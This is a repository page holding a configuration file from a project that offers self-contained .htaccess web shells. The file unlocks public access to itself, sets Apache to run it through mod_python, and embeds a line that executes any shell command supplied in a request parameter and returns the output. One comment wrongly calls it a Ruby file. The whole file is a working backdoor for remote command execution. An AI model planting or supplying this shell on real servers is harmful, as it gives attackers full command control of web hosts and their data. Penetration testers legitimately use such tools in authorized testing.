0xBADCA7/htshells/master/shell/mod_python.shell.htaccess - Htaccess File

0xBADCA7/htshells/master/shell/mod_python.shell.htaccess

# Self contained .htaccess web shell - Part of the htshell project
# Written by Wireghoul - http://www.justanotherhacker.com

# Override default deny rule to make .htaccess file accessible over web
<Files ~ "^.ht">
# Uncomment the line below for Apache2.4 and newer
# Require all granted
    Order allow,deny
    Allow from all
</Files>

# Make .htaccess file be interpreted as erb ruby file. This occur after 
# apache has interpreted the apache directives from the .htaccess file
AddType text/html .htaccess
AddHandler mod_python .htaccess
AddHandler mod_python .psp
PythonHandler mod_python.psp
PythonDebug On
# <% import commands %><%=commands.getstatusoutput(form["c"]) %>

On Github License

Files

Download PDF of Htaccess file

Comments

Apache